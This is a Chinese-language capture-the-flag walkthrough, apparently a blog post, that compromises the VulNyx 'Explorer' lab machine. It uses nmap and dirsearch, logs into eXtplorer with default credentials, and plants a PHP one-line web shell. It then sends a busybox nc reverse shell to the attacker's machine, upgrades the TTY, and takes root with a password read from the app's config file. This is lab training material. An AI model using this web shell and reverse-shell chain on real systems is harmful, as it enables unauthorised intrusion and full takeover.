vulnyx-Explorer靶场渗透

  1. 攻击机上做namp局域网扫描发现靶机

    nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.145

  1. 扫描服务器开放了哪些端口,有什么服务

    nmap -sV -T4 -p- -A 192.168.23.145

开放了 80、22 端口

  1. 访问 80 端口开放的 http 服务

什么都没有,扫描其子目录

复制代码
dirsearch -u http://192.168.23.145 -x 403,404

存在/robots.txt ,访问之

http://192.168.23.145/robots.txt

存在/extplorer,访问之

  1. 网站貌似是一个框架搭建的,扫描识别其网站指纹

    whatweb -v http://192.168.23.145/extplorer

尝试弱口令 admin:admin,成功登录

extplorer 一款现代独立文件管理器,注重速度、安全性和易于部署。通过简洁的界面本地或远程管理您的文件。

https://github.com/soerennb/extplorer

https://www.extplorer.net/

  1. 给网站写一个一句话木马即可,先创建 shell.php 文件

再编辑 shell.php

写入一句话木马

复制代码
<?php system($_GET['cmd']);?>

访问一句话木马,尝试命令执行反弹 shell

复制代码
curl -sX GET "http://192.168.23.145/shell.php?cmd=id"
echo -n 'busybox nc 192.168.23.128 4444 -e /bin/sh' | jq -sRr @uri
curl -sX GET "http://192.168.23.145/shell.php?cmd=busybox%20nc%20192.168.23.128%204444%20-e%20%2Fbin%2Fsh"

kali 预先打开端口监听,得到反弹 shell

  1. 获取可交互式 shell

    python3 -c 'import pty;pty.spawn("/bin/bash")'
    script /dev/null -c bash

使用 script 命令记录会话。通过将输出指向 /dev/null,攻击者巧妙地利用 script 开启了一个新的 Bash 进程,从而获得了交互式环境。

信息收集一下

复制代码
id
uname -a
ls /home
cat /home/user.txt

得到普通用户 flag

  1. 查看能否 sudo 提权

    sudo -l

不行。查看extplorer web 应用的配置文件得到疑似 root 用户账户密码

复制代码
ls -laR /var/www/html/extplorer/ | grep "conf*.php"
grep -iE "user|pass" /var/www/html/extplorer/config/conf.php 
cat /var/www/html//config/conf.php

使用密码 AccessGranted#1成功登录 root 用户

得到 flag

相关推荐
Dovis(誓平步青云)11 小时前
折叠屏悬停看视频,上半屏和下半屏应该各做什么
android·java·服务器·开发语言·安全·音视频
2601_9620725012 小时前
网络安全防护指南:筑牢网络安全防线(510)
安全·web安全·php
IT大白鼠12 小时前
MSF数据库与资产管理——专业渗透测试流程
数据库·安全·msf
飞飞传输13 小时前
国产化 MOVEit 替代:文件传输架构与安全能力深度解读
大数据·运维·安全
黄俊懿13 小时前
【架构师从入门到进阶】第五章:DNS&CDN&网关优化思路——第十节:网关安全-单向加密
网络·数据库·计算机网络·安全·架构·系统架构·架构师
海盗123414 小时前
AI新闻日报_2026-08-24——AI 安全从理论风险变成现实事件——Coding Agent 越狱与具身机器人运动会共塑“干活即合规“新基线
人工智能·安全·机器人
cfm_291415 小时前
ConcurrentHashMap 线程安全机制与 JDK 1.8 演进
java·开发语言·安全
智购科技无人售货机工厂16 小时前
2026自动售货机防拆机物理安全设计:从安全螺丝到结构互锁的工程实践~YH
android·网络·驱动开发·python·单片机·安全·云原生
黄俊懿17 小时前
【架构师从入门到进阶】第五章:DNS&CDN&网关优化思路——第八节:网关-注入攻击与预防
sql·网络安全·架构·系统架构·架构师·架构设计
黄俊懿17 小时前
【架构师从入门到进阶】第五章:DNS&CDN&网关优化思路——第七节:网关-XSS攻击与预防
网关·网络安全·架构·系统架构·架构师·xss·架构设计